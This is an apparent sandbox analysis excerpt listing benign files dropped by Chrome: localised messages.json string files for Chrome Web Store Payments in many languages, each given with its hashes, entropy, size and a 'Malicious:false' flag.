                                                              Preview:{.. "app_description": {.. "message": "Sistema de pagaments de Chrome Web Store".. },.. "app_name": {.. "message": "Sistema de pagaments de Chrome Web Store".. },.. "craw_app_unavailable": {.. "message": "Ara mateix aquesta aplicaci. no est. disponible.".. },.. "craw_connect_to_network": {.. "message": "Connecteu-vos a una xarxa.".. },.. "iap_unavailable": {.. "message": "La funci. Pagaments a l'aplicaci. no est. disponible actualment.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Inicieu la sessi. a Chrome.".. }..}..
                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              File Type:UTF-8 Unicode text, with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):641
                                                              Entropy (8bit):4.698608127109193
                                                              Encrypted:false
                                                              SSDEEP:12:1HEJfZGGfZ+WYpU34OBh+dgN/O8ZpU34j05U03OyZnLAOfTYWc:1HEl4G8WYpdt8Zpq5TOGAOfW
                                                              MD5:76DEC64ED1556180B452A13C83171883
                                                              SHA1:CFB1E56FD587BCDC459C1D9A683B71F9849058F9
                                                              SHA-256:32290D69A90E6BAAC428B10382C99221B12773BB9A184F3B93DFB48A4F6D7A40
                                                              SHA-512:5230A217968D5DC463E2E92D704544311A721E5CEF65C3125CBD8DEB9C0293D3BFB5C820A6011ABF77095FDEE7DAF67D541DC202B0C9CDB0908CBB85D84885CB
                                                              Malicious:false
                                                              Preview:{.. "app_description": {.. "message": "Platby Internetov.ho obchodu Chrome".. },.. "app_name": {.. "message": "Platby Internetov.ho obchodu Chrome".. },.. "craw_app_unavailable": {.. "message": "Aplikace v sou.asn. dob. nen. dostupn..".. },.. "craw_connect_to_network": {.. "message": "P.ipojte se pros.m k s.ti.".. },.. "iap_unavailable": {.. "message": "Platby v aplikaci aktu.ln. nejsou k dispozici.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "P.ihlaste se do Chromu.".. }..}..
                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              File Type:UTF-8 Unicode text, with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):624
                                                              Entropy (8bit):4.5289746475384565
                                                              Encrypted:false
                                                              SSDEEP:12:1HEJJMKKFZGGJMKKFZ+WYpU34OHu+dgxlCZO8ZpU34J4Wu03OyZnLAOfTYzD:1HErMKfqMKVWYpM6lL8ZpDNOGAOfiD
                                                              MD5:238B97A36E411E42FF37CEFAF2927ED1
                                                              SHA1:4E47AC90BA24C8F4724D9293FA40CFD4ADA66FE0
                                                              SHA-256:4977D4A053542FF66967FAED6B06585DD70E68E20BFEB533B66FE3287F9655D9
                                                              SHA-512:FD0742D47B5F5AB9AAD9B4C3D57F63CB693E060EECE123A72036C6E92156D099495C7E9E9CC6DC83EEBCDDCC4B4C81FB47E4C9559DA3EBA024780FFF10C53E0A
                                                              Malicious:false
                                                              Preview:{.. "app_description": {.. "message": "Betalinger i Chrome Webshop".. },.. "app_name": {.. "message": "Betalinger i Chrome Webshop".. },.. "craw_app_unavailable": {.. "message": "Appen er ikke tilg.ngelig i .jeblikket.".. },.. "craw_connect_to_network": {.. "message": "Opret forbindelse til et netv.rk.".. },.. "iap_unavailable": {.. "message": "Betaling i appen er ikke tilg.ngelig i .jeblikket.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Log ind p. Chrome.".. }..}..
                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              File Type:UTF-8 Unicode text, with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):651
                                                              Entropy (8bit):4.583694000020627
                                                              Encrypted:false
                                                              SSDEEP:12:1HEJQ1ZGGQ1Z+WYpU34pCEMT+dgJMlCTO8ZpU34p6FK603OyZnLAOfTYJ6K:1HEzWWYp3Bewv8Zp7k4OGAOfQj
                                                              MD5:6B3E916E8C1991AA0453CBA00FEDCAAA
                                                              SHA1:D6366D15912E40CA107FD42BFE9579C3336A51F9
                                                              SHA-256:A62FFAB910E31531758EEE48B2CC71A8857BEC3021DEAD50B668CBA3C8667053
                                                              SHA-512:87EA4311B61F29543B13F3E17DFA919D0C320B4FE370CC152E0B1514BCA79B0ABB526DDCF08621D6EBFA48923EE8FB4C667EFB120A72BD9583EEBEE7BFB80552
                                                              Malicious:false
                                                              Preview:{.. "app_description": {.. "message": "Chrome Web Store-Zahlungen".. },.. "app_name": {.. "message": "Chrome Web Store-Zahlungen".. },.. "craw_app_unavailable": {.. "message": "Die App ist momentan nicht verf.gbar.".. },.. "craw_connect_to_network": {.. "message": "Bitte stellen Sie eine Verbindung zu einem Netzwerk her.".. },.. "iap_unavailable": {.. "message": "In-App-Zahlungen sind momentan nicht m.glich.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Bitte melden Sie sich in Chrome an.".. }..}..
                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              File Type:UTF-8 Unicode text, with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):787
                                                              Entropy (8bit):4.973349962793468
                                                              Encrypted:false
                                                              SSDEEP:24:1HEw+aZ+6WYpbWZe80A08ZpCGyDVWlOGAOf+XD:WguYpCZnpEZbGoD
                                                              MD5:05C437A322C1148B5F78B2F341339147
                                                              SHA1:AB53003A678E44A170E73711FBD9949833BBF3AA
                                                              SHA-256:A052C32B4FCAC61152EB0ADB2C260FB6A8256AD104AA0013DB93E9798D41A070
                                                              SHA-512:C36CB9202A34356DD06D377E2A088F428D0B8EBE7D2E54F8380485E9D94A0598D7F651C1E7A2FD55BE481D49C02B0812F2BA335E08611EC85EE0BD60784A6B40
                                                              Malicious:false
                                                              Preview:{.. "app_description": {.. "message": "........ ... Chrome Web Store".. },.. "app_name": {.. "message": "........ ... Chrome Web Store".. },.. "craw_app_unavailable": {.. "message": ". ........ .... .. ..... ... ..... ..........".. },.. "craw_connect_to_network": {.. "message": ".......... .. ... .......".. },.. "iap_unavailable": {.. "message": ".. ........ ..... ......... ... ..... ..... .. ...... ...........".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": ".......... ... Chrome.".. }..}..
                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              File Type:ASCII text, with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):593
                                                              Entropy (8bit):4.483686991119526
                                                              Encrypted:false
                                                              SSDEEP:12:1HEJ6GG6+WYpU34OuFpR+dgGfFZO8ZpU34aEGFpR03OyZnLAOfTYdD:1HEVSWYpVp0JS8Zp5KpaOGAOfuD
                                                              MD5:91F5BC87FD478A007EC68C4E8ADF11AC
                                                              SHA1:D07DD49E4EF3B36DAD7D038B7E999AE850C5BEF6
                                                              SHA-256:92F1246C21DD5FD7266EBFD65798C61E403D01A816CC3CF780DB5C8AA2E3D9C9
                                                              SHA-512:FDC2A29B04E67DDBBD8FB6E8D2443E46BADCB2B2FB3A850BBD6198CDCCC32EE0BD8A9769D929FEEFE84D1015145E6664AB5FEA114DF5A864CF963BF98A65FFD9
                                                              Malicious:false
                                                              Preview:{.. "app_description": {.. "message": "Chrome Web Store Payments".. },.. "app_name": {.. "message": "Chrome Web Store Payments".. },.. "craw_app_unavailable": {.. "message": "App currently unavailable.".. },.. "craw_connect_to_network": {.. "message": "Please connect to a network.".. },.. "iap_unavailable": {.. "message": "In-App Payments is currently unavailable.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Please sign into Chrome.".. }..}..
                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              File Type:ASCII text, with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):593
                                                              Entropy (8bit):4.483686991119526
                                                              Encrypted:false
                                                              SSDEEP:12:1HEJ6GG6+WYpU34OuFpR+dgGfFZO8ZpU34aEGFpR03OyZnLAOfTYdD:1HEVSWYpVp0JS8Zp5KpaOGAOfuD
                                                              MD5:91F5BC87FD478A007EC68C4E8ADF11AC
                                                              SHA1:D07DD49E4EF3B36DAD7D038B7E999AE850C5BEF6
                                                              SHA-256:92F1246C21DD5FD7266EBFD65798C61E403D01A816CC3CF780DB5C8AA2E3D9C9
                                                              SHA-512:FDC2A29B04E67DDBBD8FB6E8D2443E46BADCB2B2FB3A850BBD6198CDCCC32EE0BD8A9769D929FEEFE84D1015145E6664AB5FEA114DF5A864CF963BF98A65FFD9
                                                              Malicious:false
                                                              Preview:{.. "app_description": {.. "message": "Chrome Web Store Payments".. },.. "app_name": {.. "message": "Chrome Web Store Payments".. },.. "craw_app_unavailable": {.. "message": "App currently unavailable.".. },.. "craw_connect_to_network": {.. "message": "Please connect to a network.".. },.. "iap_unavailable": {.. "message": "In-App Payments is currently unavailable.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Please sign into Chrome.".. }..}..
                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              File Type:UTF-8 Unicode text, with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):661
                                                              Entropy (8bit):4.450938335136508
                                                              Encrypted:false
                                                              SSDEEP:12:1HEJHlbGGHlb+WYpU34ubdDH+dgxbFxTO8ZpU34lPbdlVo03OyZnLAOfTY6xjD:1HEvaC6WYpcDeEFxq8ZpNl5OGAOffD
                                                              MD5:82719BD3999AD66193A9B0BB525F97CD
                                                              SHA1:41194D511F1ACC16C1CA828AC81C18C8C6B47287
                                                              SHA-256:4DB9B2721E625C18B9E05C04B31AF5D9694712F1CAAF6219ABE34BB08E5DB1C7
                                                              SHA-512:D4C49B43427799B6292CEED11CACB1D76F7CE43EBF402B43B638A6EB2B414ED0981E386CB8CDF0B51D1BD9552934FE25B2F6392266BB73D8C9A691F65BCE0128
                                                              Malicious:false
                                                              Preview:{.. "app_description": {.. "message": "Sistema de pagos de Chrome Web Store".. },.. "app_name": {.. "message": "Sistema de pagos de Chrome Web Store".. },.. "craw_app_unavailable": {.. "message": "Esta aplicaci.n no est. disponible en este momento.".. },.. "craw_connect_to_network": {.. "message": "Con.ctate a una red.".. },.. "iap_unavailable": {.. "message": "Los pagos en la aplicaci.n no est.n disponibles en este momento.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Inicia sesi.n en Chrome.".. }..}..
                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              File Type:UTF-8 Unicode text, with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):637
                                                              Entropy (8bit):4.47253983486615
                                                              Encrypted:false
                                                              SSDEEP:12:1HEJHlbGGHlb+WYpU34ubdDH+dgxbFxTO8ZpU34GLO03OyZnLAOfTYiJD:1HEvaC6WYpcDeEFxq8Zp4LlOGAOfvD
                                                              MD5:6B2583D8D1C147E36A69A88009CBEBC7
                                                              SHA1:4D4DEEB4BE6AA0181825F3371A761ABC5B4D5937
                                                              SHA-256:6659BC3705311D7641A73995DCFEA80C7734F2F4EBBC3787B3892A240348324F
                                                              SHA-512:37F0DBFCC1B5A2B8E4C92C49D2D9DEEF25616421350324F57E0149A45A6CCB437F5E3CBE97412C4B5DBBF2593783C7DF71E9C25A851AEAE6E4764C545723FA53
                                                              Malicious:false
                                                              Preview:{.. "app_description": {.. "message": "Sistema de pagos de Chrome Web Store".. },.. "app_name": {.. "message": "Sistema de pagos de Chrome Web Store".. },.. "craw_app_unavailable": {.. "message": "Esta aplicaci.n no est. disponible en este momento.".. },.. "craw_connect_to_network": {.. "message": "Con.ctate a una red.".. },.. "iap_unavailable": {.. "message": "En este momento, Pagos En-Apps no est. disponible.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Accede a Chrome.".. }..}..
                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              File Type:UTF-8 Unicode text, with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):595
                                                              Entropy (8bit):4.467205425399467
                                                              Encrypted:false
                                                              SSDEEP:12:1HEJfPGGGfPG+WYpU34Ze7z+dgrW9O8ZpU34ZwZz03OyZnLAOfTYgoLIR:1HEdvqlWYpTeObk8ZpT/OGAOfuLIR
                                                              MD5:CFF6CB76EC724B17C1BC920726CB35A7
                                                              SHA1:14ED068251D65A840F00C05409D705259D329FFC
                                                              SHA-256:C85800BF45942FCC7FD6B1DF929C25F9CC2A977A6678966BD03D4B6B69889AFD
                                                              SHA-512:53D7D01BB30C0306DE65A79FD9551D2E8C1F71F4F45F71906B009071CB3E0F231E6A50FDD78773E9B4DE94085BC7B97F829842FA21A89A2080D33458B745C46F
                                                              Malicious:false
                                                              Preview:{.. "app_description": {.. "message": "Chrome'i veebipoe maksed".. },.. "app_name": {.. "message": "Chrome'i veebipoe maksed".. },.. "craw_app_unavailable": {.. "message": "Rakendus pole praegu saadaval.".. },.. "craw_connect_to_network": {.. "message": "Looge .hendus v.rguga.".. },.. "iap_unavailable": {.. "message": "Rakendusesisesed maksed ei ole praegu saadaval.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Logige Chrome'i sisse.".. }..}..
                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              File Type:UTF-8 Unicode text, with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):647
                                                              Entropy (8bit):4.595421267152647
                                                              Encrypted:false
                                                              SSDEEP:12:1HEJRuzGGRuz+WYpU34ujSBu+dgYO8ZpU34J+Bu03OyZnLAOfTY5HN:1HEFcWYpPNa8ZpD+FOGAOfEHN
                                                              MD5:3A01FEE829445C482D1721FF63153D16
                                                              SHA1:F3EAAADDC03F943FC88B30B67F534AA13E3336DD
                                                              SHA-256:0BDE54B20845124113383B6EB81E43A0F05E4EB0C44BEE3C1DFAC4CC5FEC2836
                                                              SHA-512:3B92B6C86D30FD36AA3CEFF8773BA60C3FC5CC19C693540137044C5838A5503895C770C0336A4D0A3DB5E42F3FB36274D8D3F85B9DCA2F3EC0E974FDDB0BEAD8
                                                              Malicious:false
                                                              Preview:{.. "app_description": {.. "message": "Chrome Web Storen maksut".. },.. "app_name": {.. "message": "Chrome Web Storen maksut".. },.. "craw_app_unavailable": {.. "message": "Sovellus ei ole t.ll. hetkell. k.ytett.viss..".. },.. "craw_connect_to_network": {.. "message": "Muodosta verkkoyhteys.".. },.. "iap_unavailable": {.. "message": "Sovelluksen sis.iset maksut eiv.t ole t.ll. hetkell. k.ytett.viss..".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Kirjaudu sis..n Chromeen.".. }..}..
                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              File Type:ASCII text, with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):658
                                                              Entropy (8bit):4.5231229502550745
                                                              Encrypted:false
                                                              SSDEEP:12:1HEJADlbGGADlb+WYpU34hTUT+dgHfZAFFZO8ZpU34hTjzeT03OyZnLAOfTYHfvF:1HEYah6WYp7TUSoxOS8Zp7TOsOGAOfqV
                                                              MD5:57AF5B654270A945BDA8053A83353A06
                                                              SHA1:EEEF7A4F869F97CF471A05D345E74F982D15E167
                                                              SHA-256:EC002ED92359F67818B49455DFC579E140368E6A004080AF022FD4F57F6B03F2
                                                              SHA-512:5F0AE839FCF3F4EA48FF41A76655AE0F3821564AFD5D42FBB9FBB9A38E8D8F7BB5E9B6F71064588CD441261F644095A44A755C134CE546D506D9A21E488BAF52
                                                              Malicious:false
                                                              Preview:{.. "app_description": {.. "message": "Mga Pagbabayad sa Chrome Web Store".. },.. "app_name": {.. "message": "Mga Pagbabayad sa Chrome Web Store".. },.. "craw_app_unavailable": {.. "message": "Kasalukuyang hindi available ang app.".. },.. "craw_connect_to_network": {.. "message": "Mangyaring kumonekta sa isang network.".. },.. "iap_unavailable": {.. "message": "Kasalukuyang hindi available ang Mga Pagbabayad na In-App.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Mangyaring mag-sign in sa Chrome.".. }..}..
                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              File Type:UTF-8 Unicode text, with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):677
                                                              Entropy (8bit):4.552569602149629
                                                              Encrypted:false
                                                              SSDEEP:12:1HEJALf/nbGGALf/nb+WYpU34Owdgbyb+dgdQjO8ZpU34ITQpGnbyb03OyZnLAO8:1HE4Hna1Hn6WYpNdgpY8ZpSTQwnBOGAh
                                                              MD5:8D11C90F44A6585B57B933AB38D1FFF8
                                                              SHA1:3F9D44EA8807069A32AACA2AAAD02FD892E6CC90
                                                              SHA-256:599491F8C52B945C16C441ADF45BFD45AFAE046DA07757D97C56AF4DE75ED3B5
                                                              SHA-512:D7EF7F5AD7EF1A1595825D79B69E2B1E988AD3CF1F3881496FCCD30F241E4E9C6E457F9F5D0F855DE3536DB7A40C3E1C55946B50D3F556F4A35285066A0CD6F7
                                                              Malicious:false
                                                              Preview:{.. "app_description": {.. "message": "Paiements via le Chrome.Web.Store".. },.. "app_name": {.. "message": "Paiements via le Chrome.Web.Store".. },.. "craw_app_unavailable": {.. "message": "Application indisponible pour le moment.".. },.. "craw_connect_to_network": {.. "message": "Veuillez vous connecter . un r.seau.".. },.. "iap_unavailable": {.. "message": "Les paiements via l'application ne sont pas disponibles pour le moment.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Veuillez vous connecter . Chrome.".. }..}..
                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              File Type:UTF-8 Unicode text, with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):835
                                                              Entropy (8bit):4.791154467711985
                                                              Encrypted:false
                                                              SSDEEP:24:1HEs07J0JWYp9vnCSVLP8Zp6CsOGAOf8SLm:Wh7qgYp1CMLUph1GiSLm
                                                              MD5:E376D757C8FD66AC70A7D2D49760B94E
                                                              SHA1:1525C5B1312D409604F097768503298EC440CC4D
                                                              SHA-256:8106D98C4F8DA16DB698444409558E29CC96735E188BFA303C333A5D99231C1D
                                                              SHA-512:673F3F259AF2946E4F49BBED14A2A70D44BF9FDA9D7A71DC9172BA9B7B3C7F7062B16D29682B638D485B0520ED6F99E7A735F28C7C719B539559005B69FA7555
                                                              Malicious:false
                                                              Preview:{.. "app_description": {.. "message": "Chrome ... ..... ......".. },.. "app_name": {.. "message": "Chrome ... ..... ......".. },.. "craw_app_unavailable": {.. "message": "......... .. ... ...... .... ...".. },.. "craw_connect_to_network": {.. "message": "..... ....... .. ...... .....".. },.. "iap_unavailable": {.. "message": "..-.. ...... ... ...... .... ...".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "..... Chrome ... .... .. .....".. }..}..
                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              File Type:UTF-8 Unicode text, with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):618
                                                              Entropy (8bit):4.56999230891419
                                                              Encrypted:false
                                                              SSDEEP:12:1HEJGiimxmbZGGGiimxmbZ+WYpU34OBOEuhopIO+dgcapZO8ZpU34GiiZrMrQphK:1HE4H4TH8WYpNjTta28ZpQVLP0SOGAOK
                                                              MD5:8185D0490C86363602A137F9A261CC50
                                                              SHA1:5BD933B874441CEACB9201CCC941FF67BAED6DC0
                                                              SHA-256:A2B2EC359A9DD9DCCCE02859CE1E738BD30FAA4A05F1DC522893FFDF722BBC15
                                                              SHA-512:D7629978FC031EA5F716F9C1065FB2FEAB48C15F10CD68830DC966FA1002C03DDC7ACDE314C7D075F9F3A0A68552A6ACBCCDEE24CF20B6C3DD1BCE6562D0396E
                                                              Malicious:false
                                                              Preview:{.. "app_description": {.. "message": "Pla.anja u web-trgovini Chrome".. },.. "app_name": {.. "message": "Pla.anja u web-trgovini Chrome".. },.. "craw_app_unavailable": {.. "message": "Aplikacija trenuta.no nije dostupna.".. },.. "craw_connect_to_network": {.. "message": "Pove.ite se s mre.om.".. },.. "iap_unavailable": {.. "message": "Pla.anje u aplikaciji trenuta.no nije dostupno.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Prijavite se na Chrome.".. }..}..
                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              File Type:UTF-8 Unicode text, with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):683
                                                              Entropy (8bit):4.675370843321512
                                                              Encrypted:false
                                                              SSDEEP:12:1HEJVJiGGVJi+WYpU34Hpo9O+dgMmfgijO8ZpU34Huo9O03OyZnLAOfTYBIAYm:1HEVrk5WYpQzTUg/8ZpwoXOGAOfYIAd
                                                              MD5:85609CF8623582A8376C206556ED2131
                                                              SHA1:1E16EB70DB5E59BB684866FF3E3925C2DEF25A12
                                                              SHA-256:32A249749F12ADB6A220BF9ADC272C7E5D9AD5497A38B0086D961E3ABA17FBC6
                                                              SHA-512:27883430865D3CFA6EDFE8C6CE1442BD96150B5CE520CCF7D556A330CAA6392C712B47BD86F7350E174876BC681F6DEC94D1312402655B0AF90883A2899EC78B
                                                              Malicious:false
                                                              Preview:{.. "app_description": {.. "message": "Chrome Internetes .ruh.z Fizet.si rendszere".. },.. "app_name": {.. "message": "Chrome Internetes .ruh.z Fizet.si rendszere".. },.. "craw_app_unavailable": {.. "message": "Az alkalmaz.s jelenleg nem .rhet. el.".. },.. "craw_connect_to_network": {.. "message": "K.rj.k, csatlakozzon egy h.l.zathoz.".. },.. "iap_unavailable": {.. "message": "Az alkalmaz.son bel.li fizet.s jelenleg nem .rhet. el.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Jelentkezzen be a Chrome-ba.".. }..}..
                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              File Type:ASCII text, with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):604
                                                              Entropy (8bit):4.465685261172395
                                                              Encrypted:false
                                                              SSDEEP:12:1HEJs25bGGs25b+WYpU34ORBHAeSJ+dgkmO8ZpU34s22C/SzFAs03OyZnLAOfTYR:1HEBaA6WYpaHFH8ZptOYOGAOf2D
                                                              MD5:EAB2B946D1232AB98137E760954003AA
                                                              SHA1:60BDC2937905B311D2C9844DF2D639D7AC9F7F67
                                                              SHA-256:C6E8800450602DE0F39FE9F6854472383813FB454B08ABAE7E25A9167CE004C3
                                                              SHA-512:970FEC9A9EF0BAF7F693C4C5977F3B47914579C5B5414FCE9DBB5E4574659A5BB9AD2DE0CC886B368F49C019785AF7D2D7FE82F71341F039EADC399ED776CA12
                                                              Malicious:false
                                                              Preview:{.. "app_description": {.. "message": "Pembayaran Chrome Webstore".. },.. "app_name": {.. "message": "Pembayaran Chrome Webstore".. },.. "craw_app_unavailable": {.. "message": "Aplikasi tidak tersedia saat ini.".. },.. "craw_connect_to_network": {.. "message": "Sambungkan ke jaringan.".. },.. "iap_unavailable": {.. "message": "Pembayaran Dalam Aplikasi saat ini tidak tersedia.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Harap masuk ke Chrome.".. }..}..
                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              File Type:UTF-8 Unicode text, with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):603
                                                              Entropy (8bit):4.479418964635223
                                                              Encrypted:false
                                                              SSDEEP:12:1HEJsqd/bGGsqd/b+WYpU34OcX4+dgUvIO8ZpU34vq703OyZnLAOfTYsD:1HEXd/aKd/6WYpZrv58ZpskOGAOfzD
                                                              MD5:A328EEF5E841E0C72D3CD7366899C5C8
                                                              SHA1:2851ED658385804E87911643F5A4200B1FB26E13
                                                              SHA-256:CD891C45F7586FB4A2514205A11F260E4A6D4482FA03D901909DD9F57BE0536D
                                                              SHA-512:E47297896E981774EC3B59D41B89D6BA9333F6B4435EB9727D8645A46B10C7D408ADE06844871FA757382FBE7E645276449DB7B1B23BC59C9A71A5CB5A5ECC57
                                                              Malicious:false
                                                              Preview:{.. "app_description": {.. "message": "Pagamenti Chrome Web Store".. },.. "app_name": {.. "message": "Pagamenti Chrome Web Store".. },.. "craw_app_unavailable": {.. "message": "App al momento non disponibile.".. },.. "craw_connect_to_network": {.. "message": "Collegati a una rete.".. },.. "iap_unavailable": {.. "message": "La funzione Pagamenti In-App non . al momento disponibile.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Accedi a Chrome.".. }..}..
                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              File Type:UTF-8 Unicode text, with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):697
                                                              Entropy (8bit):5.20469020877498
                                                              Encrypted:false
                                                              SSDEEP:12:1HEJ07uGG07u+WYpU34DB+dgnsVztO8ZpU34MwiB03OyZnLAOfTYmSH:1HEcnDNWYp1kxU8Zp2wiqOGAOfpSH
                                                              MD5:9B3A5D473C3F2BBFAEECE94A07A940B8
                                                              SHA1:61BACA342CF766BBA15C7B4D892A0E7DAC9405AA
                                                              SHA-256:706312A4A2AEF3317223F141EB2B82685345B7EED444F16BB4DF3A272716DA1F
                                                              SHA-512:94F6FEE9A11BD890AB8211C98D1CC142348961EBCF756F66477A3E3A76519804B70BE0AE4E551739F8AFE32D7ADE6EDE04EF6B9B9EED03E3A857E6058EEDD4C6
                                                              Malicious:false
                                                              Preview:{.. "app_description": {.. "message": "Chrome ........".. },.. "app_name": {.. "message": "Chrome ........".. },.. "craw_app_unavailable": {.. "message": ".................".. },.. "craw_connect_to_network": {.. "message": "................".. },.. "iap_unavailable": {.. "message": ".......................".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Chrome ............".. }..}..
                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              File Type:UTF-8 Unicode text, with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):631
                                                              Entropy (8bit):5.160315577642469
                                                              Encrypted:false
                                                              SSDEEP:12:1HEJ1GG1+WYpU34K3aT+dgh8d0HTO8ZpU34KaNkaT03OyZnLAOfTY/YeHx:1HEajWYpc3aSl0Hq8Zpc6kasOGAOfyYA
                                                              MD5:9F6B4D82A70C74CA751E2EAE70FAB5CF
                                                              SHA1:0534F125FFCE8222277CF2BE3401C59DAF9217F8
                                                              SHA-256:D1467B8D037114403E8F4EFC52E88C4A7FEB96126BE4CFF883FEFF1084EF7E68
                                                              SHA-512:ED9319830314385D09C06F62EE34186E8CA576C857981205E4468A28B3ACD2AB03384E77B866032C324ABDD97A56EFD08E2D6E0C79D563578B3EC52517819BD8
                                                              Malicious:false
                                                              Preview:{.. "app_description": {.. "message": "Chrome . ... ..".. },.. "app_name": {.. "message": "Chrome . ... ..".. },.. "craw_app_unavailable": {.. "message": ".. .. ... . .....".. },.. "craw_connect_to_network": {.. "message": "..... ......".. },.. "iap_unavailable": {.. "message": ".. .. ... ... . .....".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Chrome. .......".. }..}..
                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              File Type:UTF-8 Unicode text, with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):665
                                                              Entropy (8bit):4.66839186029557
                                                              Encrypted:false
                                                              SSDEEP:12:1HEJpqHnkGGpqHnk+WYpU346M+dgV6O8ZpU34WzSWz03OyZnLAOfTYx:1HELqHtKqHPWYpM3A8ZpwGzOGAOfg
                                                              MD5:4CA644F875606986A9898D04BDAE3EA5
                                                              SHA1:722A10569E93975129D67FBDB75B537D9D622AD1
                                                              SHA-256:7C311AB751D840D750C11553C083785813E079C1D464FE568A98C9E3EF3DB96C
                                                              SHA-512:E575E3D0622F5BD4B6C0EE79128A1B1F1882195670139D1983F4377D847141B8FB8EBB8BCED82AF3A220ED07D3577AFBE085BADC0E9C7678292B80E3EC5D3444
                                                              Malicious:false
                                                              Preview:{.. "app_description": {.. "message": ".Chrome. internetin.s parduotuv.s mok.jimo sistema".. },.. "app_name": {.. "message": ".Chrome. internetin.s parduotuv.s mok.jimo sistema".. },.. "craw_app_unavailable": {.. "message": "Programa .iuo metu negalima.".. },.. "craw_connect_to_network": {.. "message": "Prisijunkite prie tinklo.".. },.. "iap_unavailable": {.. "message": "Mok.jimai programoje .iuo metu negalimi.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Prisijunkite prie .Chrome..".. }..}..
                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              File Type:UTF-8 Unicode text, with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):671
                                                              Entropy (8bit):4.631774066483956
                                                              Encrypted:false
                                                              SSDEEP:12:1HEJFhVbGGFhVb+WYpU34wDoz+dgGedBO8ZpU34wF03OyZnLAOfTYGYID:1HENQKkWYp2Doy/em8Zp2WOGAOfRYID
                                                              MD5:C5CE2C51391EAFD3DA9E4C71549A3C28
                                                              SHA1:1F67FF6EF6E90C0CE3AAF56ED543A3EFD381574D
                                                              SHA-256:1FA1DF2CA8516DEF490FB8484E9AA498ACFF80EEF5C9258FFE42D3678E6C7DED
